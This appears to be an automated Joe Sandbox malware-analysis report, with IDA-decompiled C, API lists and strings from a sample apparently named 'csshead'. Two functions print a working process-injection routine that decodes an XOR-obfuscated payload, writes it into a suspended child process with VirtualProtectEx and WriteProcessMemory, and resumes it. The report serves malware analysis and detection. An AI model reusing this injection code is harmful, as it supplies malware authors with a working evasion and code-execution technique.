LoadLibraryA.KERNEL32(00401CAC), ref: 0040301C
LoadLibraryA.KERNEL32(00401D08), ref: 004030A9
LoadLibraryA.KERNEL32(00401C20), ref: 00403388
LoadLibraryA.KERNEL32(00401BF8), ref: 004033CD
LoadLibraryA.KERNEL32(00401C28), ref: 00403412
LoadLibraryA.KERNEL32(00401EEC), ref: 00403457
LoadLibraryA.KERNELBASE(00401C38), ref: 0040348A
LoadLibraryA.KERNELBASE(00401CA4), ref: 004034CF
LoadLibraryA.KERNEL32(00401EDC), ref: 0040350C
LoadLibraryA.KERNEL32(00401EE4), ref: 00403683

Strings

W[Q, xrefs: 00402B7F
'`+9, xrefs: 00402A17
z{y<, xrefs: 004035FF
'\/, xrefs: 004036E6
D$C2, xrefs: 004028AF
+WJ, xrefs: 00402627
j, xrefs: 00402759
:H, xrefs: 00402BD9
B=K, xrefs: 0040319C
ad, xrefs: 004037D0
`M<, xrefs: 004031C0
A;=S, xrefs: 004027C5
Psapi, xrefs: 00402FD5
_p5:, xrefs: 00402CC3
xtz:, xrefs: 004027B3
WO, xrefs: 00402B49

Memory Dump Source

Source File: 00000000.00000002.16598097640.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598108329.00403000.00000020.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 004260A2, Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 109
librarythread

C-Code - Quality: 51%

			E004260A2(void* __ebx, void* __fp0) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t14;
				void* _t15;
				void* _t16;
				_Unknown_base(*)()* _t17;
				void* _t18;
				intOrPtr* _t20;
				intOrPtr _t21;
				intOrPtr* _t23;
				long _t26;
				void* _t30;
				struct HINSTANCE__* _t35;
				intOrPtr* _t36;
				void* _t39;
				intOrPtr* _t41;
				void* _t42;
				void* _t45;

				_t45 = __fp0;
				_t30 = __ebx;
				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t35 != 0) {
					 *0x442c68 = GetProcAddress(_t35, "FlsAlloc");
					 *0x442c6c = GetProcAddress(_t35, "FlsGetValue");
					 *0x442c70 = GetProcAddress(_t35, "FlsSetValue");
					_t7 = GetProcAddress(_t35, "FlsFree");
					__eflags =  *0x442c68;
					_t39 =  *0x433168;
					 *0x442c74 = _t7;
					if( *0x442c68 == 0) {
						L6:
						 *0x442c6c =  *0x43316c;
						 *0x442c68 = 0x425d07;
						 *0x442c70 = _t39;
						 *0x442c74 =  *0x433164;
					} else {
						__eflags =  *0x442c6c;
						if( *0x442c6c == 0) {
							goto L6;
						} else {
							__eflags =  *0x442c70;
							if( *0x442c70 == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					 *0x442050 = _t10;
					__eflags = _t10 - 0xffffffff;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x442c6c);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E004243EC();
							_t41 =  *0x4331b8; // executed
							_t14 =  *_t41( *0x442c68); // executed
							 *0x442c68 = _t14; // executed
							_t15 =  *_t41( *0x442c6c); // executed
							 *0x442c6c = _t15; // executed
							_t16 =  *_t41( *0x442c70); // executed
							 *0x442c70 = _t16; // executed
							_t17 =  *_t41( *0x442c74); // executed
							 *0x442c74 = _t17;
							_t18 = L0042BF11();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								L00425D81();
								goto L15;
							} else {
								_t36 =  *0x4331bc;
								_t20 =  *_t36( *0x442c68, L00425F05); // executed
								_t21 =  *_t20();
								 *0x44204c = _t21;
								__eflags = _t21 - 0xffffffff;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t42 = E0042A124(1, 0x214);
									__eflags = _t42;
									if(_t42 == 0) {
										goto L14;
									} else {
										_t23 =  *_t36( *0x442c70,  *0x44204c, _t42); // executed
										__eflags =  *_t23();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t42);
											L00425DBE(_t30, _t36, _t42, __eflags, _t45);
											_t26 = GetCurrentThreadId();
											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
											 *_t42 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					L00425D81();
					return 0;
				}
			}

0x004260a2
0x004260a2
0x004260b0
0x004260b4
0x004260d4
0x004260e1
0x004260ee
0x004260f3
0x004260f5
0x004260fc
0x00426102
0x00426107
0x0042611f
0x00426124
0x0042612e
0x00426138
0x0042613e
0x00426109
0x00426109
0x00426110
0x00000000
0x00426112
0x00426112
0x00426119
0x00000000
0x0042611b
0x0042611b
0x0042611d
0x00000000
0x00000000
0x0042611d
0x00426119
0x00426110
0x00426143
0x00426149
0x0042614e
0x00426151
0x00426218
0x00426218
0x00426218
0x00426157
0x0042615e
0x00426160
0x00426162
0x00000000
0x00426168
0x00426168
0x00426173
0x00426179
0x00426181
0x00426186
0x0042618e
0x00426193
0x0042619b
0x004261a0
0x004261a2
0x004261a7
0x004261ac
0x004261ae
0x00426213
0x00426213
0x00000000
0x004261b0
0x004261b0
0x004261c1
0x004261c3
0x004261c5
0x004261ca
0x004261cd
0x00000000
0x004261cf
0x004261db
0x004261df
0x004261e1
0x00000000
0x004261e3
0x004261f0
0x004261f4
0x004261f6
0x00000000
0x004261f8
0x004261f8
0x004261fa
0x004261fb
0x00426202
0x00426208
0x0042620c
0x00426210
0x00426210
0x004261f6
0x004261e1
0x004261cd
0x004261ae
0x00426162
0x0042621c
0x004260b6
0x004260b6
0x004260be
0x004260be

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00424C8B), ref: 004260AA
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004260CC
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004260D9
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004260E6
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004260F3
TlsAlloc.KERNEL32(?,00424C8B), ref: 00426143
TlsSetValue.KERNEL32(00000000,?,00424C8B), ref: 0042615E
RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426179
RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426186
RtlEncodePointer.NTDLL(?,00424C8B), ref: 00426193
RtlEncodePointer.NTDLL(?,00424C8B), ref: 004261A0

Part of subcall function 0042BF11: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000FA0), ref: 0042BF39

RtlDecodePointer.NTDLL(Function_00025F05,?,00424C8B), ref: 004261C1

Part of subcall function 0042A124: Sleep.KERNEL32(00000000,00000001,00000214), ref: 0042A14C

RtlDecodePointer.NTDLL(00000000,?,00424C8B), ref: 004261F0

Part of subcall function 00425DBE: GetModuleHandleW.KERNEL32(KERNEL32.DLL,0043CE18,00000008,00425EC6,00000000,00000000), ref: 00425DCF
Part of subcall function 00425DBE: InterlockedIncrement.KERNEL32(004418D8), ref: 00425E10

GetCurrentThreadId.KERNEL32 ref: 00426202

Part of subcall function 00425D81: DecodePointer.KERNEL32(FFFFFFFF,00426218,?,00424C8B), ref: 00425D92
Part of subcall function 00425D81: TlsFree.KERNEL32(FFFFFFFF,00426218,?,00424C8B), ref: 00425DAC
Part of subcall function 00425D81: DeleteCriticalSection.KERNEL32(00000000,00000000,0003DE0A,?,00426218,?,00424C8B), ref: 0042BF78
Part of subcall function 00425D81: DeleteCriticalSection.KERNEL32(FFFFFFFF,0003DE0A,?,00426218,?,00424C8B), ref: 0042BFA2

Strings

FlsFree, xrefs: 004260E8
KERNEL32.DLL, xrefs: 004260A5
FlsGetValue, xrefs: 004260CE
FlsSetValue, xrefs: 004260DB
FlsAlloc, xrefs: 004260C6

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00403360, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 241
windowregistry

C-Code - Quality: 76%

			E00403360(intOrPtr* __ecx, void* __eflags) {
				void* __ebp;
				long _t61;
				long _t64;
				long _t70;
				long _t75;
				intOrPtr _t79;
				void* _t85;
				long _t87;
				void* _t89;
				void* _t95;
				intOrPtr _t98;
				struct HICON__* _t111;
				signed int _t112;
				long _t144;
				intOrPtr _t146;
				CHAR* _t154;
				LONG* _t155;
				LONG* _t156;
				LONG* _t157;
				CHAR* _t158;
				intOrPtr* _t159;
				void* _t160;
				void* _t161;
				void* _t174;
				void* _t177;
				void* _t180;

				_t159 = __ecx;
				L00403120(_t161 + 0x14,  *((intOrPtr*)(_t161 + 0x24)));
				_t154 =  *(_t161 + 0x10);
				if( *((intOrPtr*)(_t154 - 8)) != 0) {
					L28:
					_t111 = SetCursor(LoadCursorA(0, 0x7f02));
					_t61 =  *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x20))))(_t154);
					__eflags = _t61;
					if(_t61 != 0) {
						__eflags =  *(_t161 + 0x38);
						if( *(_t161 + 0x38) == 0) {
							SetCursor(_t111);
							__eflags = _t154 - 0xc -  *0x440020; // 0x440010
							if(__eflags != 0) {
								_t155 =  &(_t154[0xfffffffffffffff4]);
								_t64 = InterlockedDecrement(_t155);
								__eflags = _t64;
								if(_t64 <= 0) {
									_push(_t155);
									L004221B4();
								}
							}
							return 1;
						} else {
							_t160 =  *((intOrPtr*)( *((intOrPtr*)( *_t159 + 0x50))))(_t154, 1);
							SetCursor(_t111);
							__eflags = _t154 - 0xc -  *0x440020; // 0x440010
							if(__eflags != 0) {
								_t156 =  &(_t154[0xfffffffffffffff4]);
								_t70 = InterlockedDecrement(_t156);
								__eflags = _t70;
								if(_t70 <= 0) {
									_push(_t156);
									L004221B4();
								}
							}
							return _t160;
						}
					} else {
						__eflags =  *((intOrPtr*)(_t161 + 0x34)) - _t61;
						if( *((intOrPtr*)(_t161 + 0x34)) == _t61) {
							DeleteFileA(_t154);
						}
						SetCursor(_t111);
						__eflags = _t154 - 0xc -  *0x440020; // 0x440010
						if(__eflags != 0) {
							_t157 =  &(_t154[0xfffffffffffffff4]);
							_t75 = InterlockedDecrement(_t157);
							goto L21;
						}
						goto L23;
					}
				} else {
					_t112 =  *(__ecx + 0x1c);
					L00402AC0(_t161 + 0x14, __ecx, __ecx + 0x14);
					_t158 =  *(_t161 + 0x10);
					if( *(_t161 + 0x38) != 0 &&  *((intOrPtr*)(_t158 - 8)) == 0) {
						_t95 = L00422541(_t158, ":/\\<>|:*?\"");
						_t161 = _t161 + 8;
						if(_t95 != 0) {
							_t109 = _t95 - _t158;
							if(_t95 - _t158 != 0xffffffff) {
								L00401E10(_t161 + 0x14, _t109);
								_t158 =  *(_t161 + 0x10);
							}
						}
						_t146 =  *0x440024; // 0x44001c
						_push(4);
						 *((intOrPtr*)(_t161 + 0x18)) = _t146;
						_push(_t161 + 0x18);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x2c))))() != 0 &&  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x14)) - 8)) != 0) {
							if(L00402830(_t161 + 0x18, 0x3b) == 0xffffffff) {
								_t103 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x14)) - 8));
							}
							E004024C0(_t161 + 0x18, _t159,  *((intOrPtr*)( *((intOrPtr*)(L004031A0(_t161 + 0x20, _t161 + 0x20, 0, _t103))) - 8)),  *((intOrPtr*)(L004031A0(_t161 + 0x20, _t161 + 0x20, 0, _t103))));
							L004019A0(_t161 + 0x18);
							_t158 =  *(_t161 + 0x10);
						}
						_t98 =  *((intOrPtr*)(_t161 + 0x14));
						_t174 = _t98 - 0xc -  *0x440020; // 0x440010
						if(_t174 == 0) {
							goto L14;
						} else {
							if(InterlockedDecrement(_t98 + 0xfffffff4) <= 0) {
								_push( *((intOrPtr*)(_t161 + 0x14)) + 0xfffffff4);
								L004221B4();
								_t161 = _t161 + 4;
							}
						}
					}
					_t79 =  *0x440024; // 0x44001c
					 *((intOrPtr*)(_t161 + 0x20)) = _t79;
					L00402AC0(_t161 + 0x20, _t159, _t161 + 0x10); // executed
					asm("sbb edx, edx");
					 *((intOrPtr*)(_t161 + 0x2c)) = ( ~( *(_t161 + 0x38)) & 0xfffffffd) + 0xefdc;
					 *(_t161 + 0x30) = 0;
					 *(_t161 + 0x38) = _t112;
					if(SendMessageA( *(_t112 + 0x10), RegisterWindowMessageA("WM_DOCMGRDOFILEPROMPT"), 0, _t161 + 0x1c) != 0) {
						L00402AC0(_t161 + 0x14, _t159, _t161 + 0x1c);
						_t85 =  *(_t161 + 0x1c);
						__eflags = _t85 - 0xc -  *0x440020; // 0x440010
						if(__eflags != 0) {
							_t87 = InterlockedDecrement(_t85 + 0xfffffff4);
							__eflags = _t87;
							if(_t87 <= 0) {
								_t144 =  *(_t161 + 0x1c) + 0xfffffff4;
								__eflags = _t144;
								_push(_t144);
								L004221B4();
								_t161 = _t161 + 4;
							}
						}
						_t154 =  *(_t161 + 0x10);
						goto L28;
					} else {
						_t89 =  *(_t161 + 0x1c);
						_t177 = _t89 - 0xc -  *0x440020; // 0x440010
						if(_t177 != 0 && InterlockedDecrement(_t89 + 0xfffffff4) <= 0) {
							_push( *(_t161 + 0x1c) + 0xfffffff4);
							L004221B4();
							_t161 = _t161 + 4;
						}
						_t180 = _t158 - 0xc -  *0x440020; // 0x440010
						if(_t180 != 0) {
							_t157 =  &(_t158[0xfffffffffffffff4]);
							_t75 = InterlockedDecrement(_t157);
							L21:
							if(_t75 <= 0) {
								_push(_t157);
								L004221B4();
							}
						}
						L23:
						return 0;
					}
				}
			}

0x0040336b
0x00403372
0x00403377
0x0040337f
0x00403560
0x00403576
0x00403581
0x00403583
0x00403585
0x004035b5
0x004035ba
0x004035fd
0x00403602
0x00403608
0x0040360a
0x0040360e
0x00403614
0x00403616
0x00403618
0x00403619
0x0040361e
0x00403616
0x0040362d
0x004035bc
0x004035ca
0x004035cc
0x004035d1
0x004035d7
0x004035d9
0x004035dd
0x004035e3
0x004035e5
0x004035e7
0x004035e8
0x004035ed
0x004035e5
0x004035f9
0x004035f9
0x00403587
0x00403587
0x0040358b
0x0040358e
0x0040358e
0x00403595
0x0040359a
0x004035a0
0x004035a6
0x004035aa
0x00000000
0x004035aa
0x00000000
0x004035a0
0x00403385
0x00403385
0x00403390
0x0040339a
0x0040339e
0x004033b4
0x004033b9
0x004033be
0x004033c0
0x004033c5
0x004033cc
0x004033d1
0x004033d1
0x004033c5
0x004033d5
0x004033dd
0x004033e3
0x004033ea
0x004033f1
0x0040340b
0x00403411
0x00403411
0x00403430
0x00403439
0x0040343e
0x0040343e
0x00403442
0x00403449
0x0040344f
0x00000000
0x00403451
0x0040345f
0x00403468
0x00403469
0x0040346e
0x0040346e
0x0040345f
0x0040344f
0x00403479
0x00403487
0x0040348b
0x00403496
0x004034ad
0x004034b1
0x004034b9
0x004034d0
0x0040352e
0x00403533
0x0040353a
0x00403540
0x00403546
0x00403548
0x0040354a
0x00403550
0x00403550
0x00403553
0x00403554
0x00403559
0x00403559
0x0040354a
0x0040355c
0x00000000
0x004034d2
0x004034d2
0x004034d9
0x004034df
0x004034f2
0x004034f3
0x004034f8
0x004034f8
0x004034fe
0x00403504
0x00403506
0x0040350a
0x0040350c
0x0040350e
0x00403510
0x00403511
0x00403516
0x0040350e
0x0040351c
0x00403522
0x00403522
0x004034d0

APIs

Part of subcall function 00403120: lstrlenA.KERNEL32(?), ref: 00403150

Part of subcall function 00402AC0: InterlockedDecrement.KERNEL32(00000000), ref: 00402B0B
Part of subcall function 00402AC0: InterlockedIncrement.KERNEL32 ref: 00402B33

Part of subcall function 004024C0: InterlockedDecrement.KERNEL32(00000001), ref: 0040252D

Part of subcall function 004019A0: InterlockedDecrement.KERNEL32 ref: 004019B4

InterlockedDecrement.KERNEL32(?), ref: 0040345B

Part of subcall function 00401E10: lstrlenA.KERNEL32(?), ref: 00401E24

RegisterWindowMessageA.USER32(WM_DOCMGRDOFILEPROMPT,00000000,?), ref: 004034BD
SendMessageA.USER32(?,00000000), ref: 004034C8
InterlockedDecrement.KERNEL32(?), ref: 004034E5
InterlockedDecrement.KERNEL32(?), ref: 0040350A
InterlockedDecrement.KERNEL32(?), ref: 00403546
LoadCursorA.USER32(00000000,00007F02), ref: 00403567
SetCursor.USER32(00000000), ref: 00403574
DeleteFileA.KERNEL32(?), ref: 0040358E
SetCursor.USER32(00000000), ref: 00403595
InterlockedDecrement.KERNEL32(?), ref: 004035AA
SetCursor.USER32(00000000), ref: 004035CC
InterlockedDecrement.KERNEL32(?), ref: 004035DD
SetCursor.USER32(00000000), ref: 004035FD
InterlockedDecrement.KERNEL32(?), ref: 0040360E

Strings

WM_DOCMGRDOFILEPROMPT, xrefs: 004034A8
:/\<>|:*?", xrefs: 004033AE

Memory Dump Source

Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_1_400000_csshead.jbxd

Function 00405028, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 215
threadprocessfile

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405028(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				long _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				signed int _v32;
				long _v36;
				long _v40;
				char _v44;
				struct _STARTUPINFOA _v112;
				void* _v124;
				struct _CONTEXT _v332;
				char _v353;
				signed int _t107;
				void* _t125;
				void* _t127;
				void* _t144;
				long _t154;

				_v8 = 0xffffffff;
				if(_a8 == 0) {
					_a8 = GetModuleHandleA(0);
				}
				if(_a16 != 0 && _a20 == 0xffffffff) {
					_a20 = E004012DC(_a16) + 1;
				}
				E00401258( &_v112, 0x44);
				_v112.cb = 0x44;
				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters)); // executed
				asm("sbb eax, eax");
				_t109 =  ~( ~_t107);
				if( ~( ~_t107) == 0) {
					L22:
					return _v8;
				}
				E00401164(E004010B4(_t109, 0x44),  &_v353);
				E0040133C( &_v353, "_section");
				_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
				_t125 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353); // executed
				_v12 = _t125;
				_t127 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0); // executed
				_v16 = _t127;
				E004012B8(_v16, _v24, _a8);
				 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
				 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
				E004012B8(_v16 + _v24 + 8, _a20, _a16);
				_v24 = 0x29b;
				E004013B4( &_v28, _v24 + 0x11); // executed
				E004012B8(_v28, _v24, 0x40a2ac);
				_t144 = _v24 - 1;
				if(_t144 < 0) {
					L9:
					_v20 = E004012DC( &_v353) + 1;
					E004012B8(_v28 + _v24, _v20,  &_v353);
					_v24 = _v24 + _v20;
					_v40 = 0;
					_t154 = E00404EF0(_v332.ExtendedRegisters.hProcess, _t224); // executed
					_v40 = _t154;
					if(_v40 == 0) {
						E00401258( &_v332, 0xcc);
						_v332.ContextFlags = 0x10007;
						if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
							_v40 = _v332.Eax;
						}
					}
					_t228 = _v40;
					if(_v40 == 0) {
						_v40 = E00404DE0(_v332.ExtendedRegisters.hProcess, _t228);
					}
					if(_v40 != 0) {
						VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36); // executed
						WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20); // executed
						E00401828(_v28); // executed
						ResumeThread(_v124); // executed
						if(_a24 == 0) {
							__eflags = 0;
							_v8 = 0;
						} else {
							if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
								_v8 = 0xfffffffe;
							} else {
								GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
							}
						}
						CloseHandle(_v124);
						CloseHandle(_v332.ExtendedRegisters);
					}
					goto L22;
				}
				_v44 = _t144 + 1;
				_v32 = 0;
				do {
					 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
					_v32 = _v32 + 1;
					_t55 =  &_v44;
					 *_t55 = _v44 - 1;
					_t224 =  *_t55;
				} while ( *_t55 != 0);
				goto L9;
			}

0x00405031
0x0040503c
0x00405046
0x00405046
0x0040504d
0x0040505e
0x0040505e
0x00405069
0x0040506e
0x0040508f
0x00405097
0x00405099
0x0040509d
0x004052ce
0x004052d4
0x004052d4
0x004050ae
0x004050bf
0x004050d9
0x004050f5
0x004050fb
0x0040510d
0x00405113
0x0040511f
0x00405130
0x0040513e
0x0040514f
0x00405154
0x00405164
0x00405174
0x0040517c
0x0040517f
0x004051a5
0x004051b1
0x004051c3
0x004051cb
0x004051d0
0x004051d6
0x004051db
0x004051e2
0x004051ef
0x004051f4
0x00405211
0x00405222
0x00405222
0x00405211
0x00405225
0x00405229
0x00405233
0x00405233
0x0040523a
0x00405252
0x0040526c
0x00405275
0x0040527e
0x00405288
0x004052b5
0x004052b7
0x0040528a
0x0040529a
0x004052ac
0x0040529c
0x004052a4
0x004052a4
0x0040529a
0x004052be
0x004052c8
0x004052c8
0x00000000
0x0040523a
0x00405182
0x00405185
0x0040518c
0x0040519a
0x0040519d
0x004051a0
0x004051a0
0x004051a0
0x004051a0
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00405040
CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0040508F
CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,?,?), ref: 004050F5
MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 0040510D

Part of subcall function 004013B4: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 004013CD

Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F3A
Part of subcall function 00404EF0: ReadProcessMemory.KERNELBASE(?,00000000,?,00001000,?), ref: 00404F69
Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00000018,?), ref: 00404FBC
Part of subcall function 00404EF0: ReadProcessMemory.KERNEL32(00000000,00000000,?,00001000,?), ref: 00404FED

GetThreadContext.KERNEL32(?,00010007), ref: 00405209
CloseHandle.KERNEL32(?), ref: 004052C8

Part of subcall function 00404DE0: NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 00404E09
Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E39
Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E5A
Part of subcall function 00404DE0: ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 00404E7E

VirtualProtectEx.KERNELBASE(?,00000000,0000029B,00000040,?), ref: 00405252
WriteProcessMemory.KERNELBASE(?,00000000,?,0000029B,?), ref: 0040526C

Part of subcall function 00401828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,00406A2F), ref: 0040183A

ResumeThread.KERNELBASE(?), ref: 0040527E
WaitForSingleObject.KERNEL32(?,00000000), ref: 00405292
GetExitCodeProcess.KERNEL32(?,?), ref: 004052A4
CloseHandle.KERNEL32(?), ref: 004052BE

Strings

D, xrefs: 0040506E
_section, xrefs: 004050B3

Memory Dump Source

Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_csshead.jbxd

Function 00405026, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 212
threadprocessfile

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405026(CHAR* _a4, struct HINSTANCE__* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
				long _v8;
				void* _v12;
				void* _v16;
				long _v20;
				long _v24;
				void* _v28;
				signed int _v32;
				long _v36;
				long _v40;
				char _v44;
				struct _STARTUPINFOA _v112;
				void* _v124;
				struct _CONTEXT _v332;
				char _v353;
				signed int _t107;
				void* _t125;
				void* _t127;
				void* _t144;
				long _t154;

				_v8 = 0xffffffff;
				if(_a8 == 0) {
					_a8 = GetModuleHandleA(0);
				}
				if(_a16 != 0 && _a20 == 0xffffffff) {
					_a20 = E004012DC(_a16) + 1;
				}
				E00401258( &_v112, 0x44);
				_v112.cb = 0x44;
				_t107 = CreateProcessA(0, _a4, 0, 0, 0, 4, 0, 0,  &_v112,  &(_v332.ExtendedRegisters)); // executed
				asm("sbb eax, eax");
				_t109 =  ~( ~_t107);
				if( ~( ~_t107) == 0) {
					L23:
					return _v8;
				} else {
					E00401164(E004010B4(_t109, 0x44),  &_v353);
					E0040133C( &_v353, "_section");
					_v24 =  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x3c)) + _a8 + 0x50));
					_t125 = CreateFileMappingA(0xffffffff, 0, 4, 0, _v24 + 8 + _a20,  &_v353); // executed
					_v12 = _t125;
					_t127 = MapViewOfFile(_v12, 0xf001f, 0, 0, 0); // executed
					_v16 = _t127;
					E004012B8(_v16, _v24, _a8);
					 *((intOrPtr*)(_v16 + _v24)) = _a12 - _a8;
					 *((intOrPtr*)(_v16 + _v24 + 4)) = _a20;
					E004012B8(_v16 + _v24 + 8, _a20, _a16);
					_v24 = 0x29b;
					E004013B4( &_v28, _v24 + 0x11); // executed
					E004012B8(_v28, _v24, 0x40a2ac);
					_t144 = _v24 - 1;
					if(_t144 < 0) {
						L10:
						_v20 = E004012DC( &_v353) + 1;
						E004012B8(_v28 + _v24, _v20,  &_v353);
						_v24 = _v24 + _v20;
						_v40 = 0;
						_t154 = E00404EF0(_v332.ExtendedRegisters.hProcess, _t229); // executed
						_v40 = _t154;
						if(_v40 == 0) {
							E00401258( &_v332, 0xcc);
							_v332.ContextFlags = 0x10007;
							if(GetThreadContext(_v124,  &_v332) != 0 && _v332.Eax != 0) {
								_v40 = _v332.Eax;
							}
						}
						_t233 = _v40;
						if(_v40 == 0) {
							_v40 = E00404DE0(_v332.ExtendedRegisters.hProcess, _t233);
						}
						if(_v40 != 0) {
							VirtualProtectEx(_v332.ExtendedRegisters.hProcess, _v40, _v24, 0x40,  &_v36); // executed
							WriteProcessMemory(_v332.ExtendedRegisters.hProcess, _v40, _v28, _v24,  &_v20); // executed
							E00401828(_v28); // executed
							ResumeThread(_v124); // executed
							if(_a24 == 0) {
								__eflags = 0;
								_v8 = 0;
							} else {
								if(WaitForSingleObject(_v332.ExtendedRegisters.hProcess, _a24) != 0) {
									_v8 = 0xfffffffe;
								} else {
									GetExitCodeProcess(_v332.ExtendedRegisters.hProcess,  &_v8);
								}
							}
							CloseHandle(_v124);
							CloseHandle(_v332.ExtendedRegisters);
						}
						goto L23;
					}
					_v44 = _t144 + 1;
					_v32 = 0;
					do {
						 *(_v28 + _v32) =  *(_v28 + _v32) ^ 0x000000e4 + _v32 * 0xffffff9b;
						_v32 = _v32 + 1;
						_t55 =  &_v44;
						 *_t55 = _v44 - 1;
						_t229 =  *_t55;
					} while ( *_t55 != 0);
					goto L10;
				}
			}

0x00405031
0x0040503c
0x00405046
0x00405046
0x0040504d
0x0040505e
0x0040505e
0x00405069
0x0040506e
0x0040508f
0x00405097
0x00405099
0x0040509d
0x004052ce
0x004052d4
0x004050a3
0x004050ae
0x004050bf
0x004050d9
0x004050f5
0x004050fb
0x0040510d
0x00405113
0x0040511f
0x00405130
0x0040513e
0x0040514f
0x00405154
0x00405164
0x00405174
0x0040517c
0x0040517f
0x004051a5
0x004051b1
0x004051c3
0x004051cb
0x004051d0
0x004051d6
0x004051db
0x004051e2
0x004051ef
0x004051f4
0x00405211
0x00405222
0x00405222
0x00405211
0x00405225
0x00405229
0x00405233
0x00405233
0x0040523a
0x00405252
0x0040526c
0x00405275
0x0040527e
0x00405288
0x004052b5
0x004052b7
0x0040528a
0x0040529a
0x004052ac
0x0040529c
0x004052a4
0x004052a4
0x0040529a
0x004052be
0x004052c8
0x004052c8
0x00000000
0x0040523a
0x00405182
0x00405185
0x0040518c
0x0040519a
0x0040519d
